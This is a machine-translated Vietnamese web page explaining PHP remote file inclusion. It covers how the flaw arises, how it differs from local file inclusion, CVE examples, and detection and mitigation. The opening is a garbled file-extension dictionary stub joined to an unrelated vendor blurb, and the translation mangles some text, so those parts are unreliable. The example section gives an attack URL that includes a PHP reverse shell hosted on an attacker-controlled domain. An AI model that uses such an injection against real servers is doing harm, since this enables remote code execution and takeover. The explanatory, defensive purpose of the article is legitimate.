Php rfi

Tệp RFI là gì? . RFI? . RFI và tập tin sửa lỗi. Chuyển đổi tệp N/A RFI sang định dạng khác

RFI là File Extension - Phần mở rộng tệp, dưới định dạng N/A được phát triển bởi N/A

RFI file information

  • RFI là tập tin gì? . RFI có nghĩa là     Tên tệp RFI Loại tệp Tệp Phần mở rộng tệp Nhà phát triển N/A Phân loại Phần mở rộng tệp Định dạng N/A Độ phổ biến 2 ★ [1 Bình chọn] Tệp RFI là gì? . RFI? . RFI và tập tin sửa lỗi. Chuyển đổi tệp N/A RFI sang định dạng khác. RFI là File Extension - Phần mở rộng tệp, dưới định dạng N/A được phát triển bởi N/A
  • Đây là thuật ngữ được sử dụng trong lĩnh vực

Đây là thông tin Thông tin tập tin RFI theo chủ đề được cập nhật mới nhất năm 2022

RFI end là tập tin gì?

Trên đây là thông tin giúp bạn hiểu rõ hơn về Đuôi RFI là tệp gì?. Vui lòng truy cập tudienso. com để tra cứu thông tin các thuật ngữ chuyên ngành tiếng Anh, Trung, Nhật, Hàn. liên tục được cập nhật

Cuối cùng, công nghệ cung cấp dịch vụ đám đông của chúng tôi cho phép chúng tôi duy trì cơ sở dữ liệu được cập nhật liên tục về các miền bị xâm nhập, đóng vai trò là điểm phân phối tập trung cho phần mềm độc hại được đưa vào trong các cuộc tấn công RFI. Giám sát các miền này cung cấp độ chính xác bổ sung cho quy trình lọc của chúng tôi, đồng thời cho phép phản ứng nhanh chống lại các vectơ tấn công RFI mới nổi, bao gồm cả các cuộc tấn công RFI zero-day

Bao gồm tệp từ xa [RFI] là một lỗ hổng web cho phép tin tặc độc hại buộc ứng dụng bao gồm các tệp mã tùy ý được nhập từ một vị trí khác, ví dụ: máy chủ do kẻ tấn công kiểm soát

Mức độ nghiêm trọng.
rất nghiêm trọng Tỷ lệ mắc bệnh.
rất hiếm khi được phát hiện Phạm vi.
hầu hết xuất hiện trong các phiên bản cũ hơn của PHPTác động kỹ thuật. thực thi mã từ xa Hậu quả trường hợp xấu nhất. thỏa hiệp toàn bộ hệ thốngSửa nhanh. tắt tính năng bao gồm từ xa trong cài đặt máy chủ web

Bao gồm tập tin từ xa hoạt động như thế nào?

Nhiều ngôn ngữ lập trình, bao gồm cả những ngôn ngữ được sử dụng ở phía máy chủ để phát triển ứng dụng web, cho phép nhà phát triển bao gồm mã nguồn từ các tệp khác. Một số chức năng được sử dụng để bao gồm mã nguồn chỉ cho phép bạn bao gồm các tệp cục bộ, nhưng trong một số ngôn ngữ, chúng cũng cho phép bao gồm bằng URL. Điều này hữu ích để bao gồm, ví dụ, các tệp mã nguồn nằm trên các máy chủ khác trong một ứng dụng nhiều máy chủ phức tạp

Sự bao gồm như vậy thường là tĩnh, tôi. e. URL của tệp được xác định trong mã nguồn và không thể sửa đổi. Tuy nhiên, trong một số ứng dụng, nhà phát triển có thể muốn bao gồm một tệp động từ một vị trí từ xa. Nếu vậy, URL của tệp từ xa có thể được chuyển vào tham số đầu vào của người dùng

Các lỗ hổng bao gồm tệp từ xa xảy ra khi một tác nhân độc hại có thể sửa đổi đầu vào của người dùng để bao gồm các tệp từ xa của riêng họ. Lỗ hổng này thường xảy ra nhất trong các ứng dụng và API được viết bằng các phiên bản PHP cũ hơn với biểu thức bao gồm. Trong trường hợp các ngôn ngữ lập trình ứng dụng web phổ biến khác, việc bao gồm các tệp theo cách tương tự đòi hỏi các cấu trúc lập trình phức tạp hơn nhiều

Lưu ý rằng khả năng bao gồm các tệp từ xa không được dùng nữa kể từ PHP 7. 4. 0, phát hành vào tháng 11 năm 2019

Bao gồm tập tin từ xa so với. bao gồm tệp cục bộ

Nếu kẻ tấn công chỉ có thể bao gồm một tệp độc hại từ cùng một máy chủ, thì đó là lỗ hổng bao gồm tệp cục bộ [LFI]. Các lỗ hổng LFI phổ biến hơn nhiều vì nhiều lý do

  • LFI không chỉ bao gồm các trường hợp khi nhà phát triển bao gồm tệp mã nguồn mà còn bao gồm tất cả các trường hợp kẻ tấn công có thể truy cập tệp cục bộ mà họ không thể truy cập được
  • LFI xảy ra ở hầu hết các ngôn ngữ lập trình web, không chỉ PHP, vì các ngôn ngữ khác cũng cho phép nhà phát triển mở và/hoặc bao gồm các tệp cục bộ
  • Các nhà phát triển thường cần bao gồm mã nguồn cục bộ hoặc đọc và hiển thị nội dung của các tệp cục bộ, điều này có thể dẫn đến LFI. Họ hiếm khi cần bao gồm mã nguồn từ các địa điểm ở xa, điều này cần thiết cho RFI

Bao gồm tệp cục bộ cũng thường đi cùng với duyệt thư mục. Mặt khác, RFI, theo định nghĩa, không thể dẫn đến duyệt thư mục vì tệp được bao gồm bởi URL, không phải theo đường dẫn/tên tệp

Bạn cũng có thể nghĩ về RFI như một cuộc tấn công theo cách tương tự như kịch bản chéo trang. Trong cả hai trường hợp, một ứng dụng dễ bị tấn công lấy mã không đáng tin cậy từ nguồn bên ngoài và thực thi nó. Tuy nhiên, trong trường hợp của RFI, kẻ tấn công đang lạm dụng cơ chế PHP include thay vì thẻ

Ví dụ về một cuộc tấn công bao gồm tập tin từ xa

Dưới đây là một ví dụ về mã PHP có lỗ hổng bao gồm tệp từ xa, cũng như một vectơ tấn công trên một ứng dụng bao gồm mã này

Nhà phát triển ứng dụng PHP muốn bao gồm tệp mã nguồn từ máy chủ khác nhưng tệp được bao gồm không phải là tĩnh. Sau đây là một đoạn mã từ chỉ mục. tập tin php

Máy chủ chạy PHP 7. 3. 33. php. ini bao gồm tham số cấu hình sau

allow_url_include = On

Tham số này [không dùng nữa trong PHP 7. 4. 0] có nghĩa là biểu thức bao gồm có thể phân tích một URL và bao gồm một tệp từ URL đó

URL được lấy trực tiếp từ yêu cầu GET HTTP, vì vậy bạn có thể bao gồm mô-đun http. // máy chủ2. ví dụ. com/chào mừng. php như sau

//example.com/index.php?module=//server2.example.com/welcome.php

Vectơ tấn công

Kẻ tấn công thao túng yêu cầu GET được gửi đến chỉ mục. php để bao gồm một URL có tập lệnh shell ngược khỉ pentest được định cấu hình để kết nối với máy chủ do kẻ tấn công kiểm soát

//example.com/index.php?module=//attacker.example2.com/php-reverse-shell.php

Kết quả là ứng dụng chạy mã của trình bao đảo ngược [thực thi mã từ xa], cấp cho kẻ tấn công quyền truy cập từ xa vào dòng lệnh của máy chủ

Hậu quả tiềm ẩn của một cuộc tấn công bao gồm tập tin từ xa

Như bạn có thể thấy từ các ví dụ trên, các lỗ hổng bao gồm tệp từ xa có thể dẫn đến thực thi mã từ xa và kết quả là kẻ tấn công có thể giành quyền kiểm soát hoàn toàn máy chủ. Tuy nhiên, mã được bao gồm có quyền thực thi giống như người dùng máy chủ web, vì vậy quyền truy cập của nó bị hạn chế

Trong một cuộc tấn công RFI, tội phạm mạng có thể sử dụng bất kỳ mã độc hại nào, do đó, tùy thuộc vào ý định của chúng, chúng có thể cố gắng chuyển RFI sang bất kỳ kịch bản tấn công mạng nào sau đây

  • Ransomware hoặc phần mềm độc hại khác. Kẻ tấn công có thể leo thang cuộc tấn công để tải tác nhân ransomware về máy. Điều này sau đó sẽ sử dụng các phương pháp khác để lây lan sang các tài sản khác thuộc sở hữu của nạn nhân
  • Khai thác tiền mã hoá. Những kẻ tấn công thường cài đặt các công cụ khai thác tiền điện tử trên các máy bị xâm nhập. Khai thác tiêu tốn tài nguyên máy tính của bạn để cung cấp cho tội phạm mạng tài trợ cho các hoạt động độc hại hơn
  • Đánh cắp dữ liệu nhạy cảm. Kẻ tấn công có thể leo thang cuộc tấn công và đánh cắp thông tin xác thực để truy cập vào máy chủ cơ sở dữ liệu SQL chứa thông tin nhạy cảm như số thẻ tín dụng
  • Cửa sau. Kẻ tấn công có thể cài đặt một cửa hậu dài hạn trên hệ thống nạn nhân và sử dụng nó, ví dụ, để giám sát các hoạt động kinh doanh của nạn nhân

Ví dụ về các lỗ hổng bao gồm tệp từ xa đã biết

Sau đây là một số ví dụ về các ứng dụng web nguồn mở phổ biến có lỗ hổng bao gồm tệp từ xa

  • CVE-2018-16283. Nhiều plugin WordPress trước đây có lỗ hổng RFI, với một trong những plugin gần đây nhất là plugin Wechat Broadcast 1. 2. 0
  • CVE-2014-7228. Lõi Joomla đã gặp phải các lỗ hổng RFI nhiều lần, với trường hợp gần đây nhất liên quan đến Joomla 2. 5. 4 đến 2. 5. 25, 3. 2. 5 trở về trước, và 3. 3. 0 đến 3. 3. 4

Làm cách nào để phát hiện các lỗ hổng bao gồm tệp từ xa?

Cách tốt nhất để phát hiện các lỗ hổng bao gồm tệp từ xa tùy thuộc vào việc chúng đã được biết hay chưa

  • Nếu bạn chỉ sử dụng phần mềm thương mại hoặc nguồn mở và không phát triển phần mềm của riêng mình, thì bạn có thể thấy đủ để xác định phiên bản chính xác của hệ thống hoặc ứng dụng mà bạn đang sử dụng. Nếu phiên bản được xác định dễ bị bao gồm tệp từ xa, bạn có thể cho rằng bạn dễ bị lỗ hổng bao gồm tệp từ xa đó. Bạn có thể xác định phiên bản theo cách thủ công hoặc sử dụng công cụ bảo mật phù hợp, chẳng hạn như phần mềm phân tích thành phần phần mềm [SCA] trong trường hợp ứng dụng web hoặc trình quét mạng trong trường hợp ứng dụng và hệ thống nối mạng
  • Nếu bạn phát triển phần mềm của riêng mình hoặc muốn tìm các lỗ hổng bao gồm tệp từ xa không xác định [zero-days] trong các ứng dụng đã biết, bạn phải có khả năng khai thác thành công lỗ hổng bao gồm tệp từ xa để chắc chắn rằng nó tồn tại. Trong những trường hợp như vậy, bạn cần thực hiện kiểm tra thâm nhập thủ công với sự trợ giúp của nhà nghiên cứu bảo mật hoặc người kiểm tra thâm nhập hoặc sử dụng công cụ kiểm tra bảo mật ứng dụng [máy quét lỗ hổng web] có thể tự động khai thác lỗ hổng. Ví dụ về các công cụ như vậy là Invicti và Acunetix của Invicti. Chúng tôi khuyên bạn nên sử dụng phương pháp này ngay cả đối với các lỗ hổng đã biết

Làm cách nào để ngăn chặn các lỗ hổng bao gồm tệp từ xa trong các ứng dụng web?

Có một số phương pháp cho phép bạn ngăn chặn các lỗ hổng bao gồm tệp từ xa trong mã của mình

  1. Hoàn toàn tránh sử dụng đầu vào của người dùng trong các biểu thức bao gồm. Điều này có nghĩa là không chỉ các URL đến từ đầu vào trực tiếp của người dùng, chẳng hạn như tham số HTTP GET/POST mà còn cả các nguồn dữ liệu khác mà kẻ tấn công có thể thao túng, chẳng hạn như cookie và tiêu đề
  2. Nếu ứng dụng của bạn yêu cầu bạn sử dụng tính năng bao gồm động và không có cách nào khác, hãy tạo danh sách trắng gồm các tệp an toàn

Ghi chú. Không dựa vào danh sách đen, mã hóa hoặc các phương pháp xác thực/khử trùng đầu vào, chẳng hạn như lọc để ngăn việc đưa vào tệp từ xa. Ví dụ: đừng cố giới hạn hoặc thực thi các phần mở rộng tệp hoặc chặn các chuỗi ký tự đặc biệt. Kẻ tấn công có nhiều cách để vượt qua các bộ lọc như vậy

Làm cách nào để giảm thiểu các cuộc tấn công bao gồm tệp từ xa?

Có hai cách rất hiệu quả để giảm thiểu các cuộc tấn công bao gồm tệp từ xa trong PHP

  • Yêu cầu quản trị viên máy chủ web của bạn nâng cấp PHP lên phiên bản 7. 4. 0 hoặc mới hơn, hoặc
  • Yêu cầu quản trị viên máy chủ web của bạn thêm chỉ thị allow_url_include = Off vào tệp php. tập tin ini

Điều này sẽ khiến việc bao gồm tệp từ xa là không thể, bất kể ứng dụng đang chạy trên máy chủ web là ứng dụng tùy chỉnh do nhà phát triển của bạn viết hay ứng dụng của bên thứ ba/nguồn mở. Tuy nhiên, điều này có thể khiến một số ứng dụng cũ ngừng hoạt động

Các câu hỏi thường gặp

Bao gồm tập tin từ xa [RFI] là gì?

Bao gồm tệp từ xa [RFI] là một lỗ hổng web cho phép tin tặc độc hại buộc ứng dụng bao gồm các tệp mã tùy ý được nhập từ một vị trí khác, ví dụ: máy chủ do kẻ tấn công kiểm soát. Nó tương tự như bao gồm tệp cục bộ

 

Đọc về bao gồm tệp cục bộ [LFI]

RFI nguy hiểm như thế nào?

Các lỗ hổng bao gồm tệp từ xa có thể dẫn đến thực thi mã từ xa và do đó, kẻ tấn công có thể giành quyền kiểm soát hoàn toàn máy chủ. Tuy nhiên, mã được bao gồm có quyền thực thi giống như người dùng máy chủ web, vì vậy quyền truy cập của nó bị hạn chế

 

Đọc một bài viết về bao gồm tập tin từ xa

Làm thế nào để tránh RFI?

Để tránh RFI và nhiều lỗ hổng khác, hãy tuân theo thói quen lập trình an toàn và không bao giờ tin vào thông tin nhập của người dùng. Nếu bạn cần bao gồm các tệp từ xa, hãy sử dụng danh sách trắng gồm các tên và vị trí tệp an toàn

Chủ Đề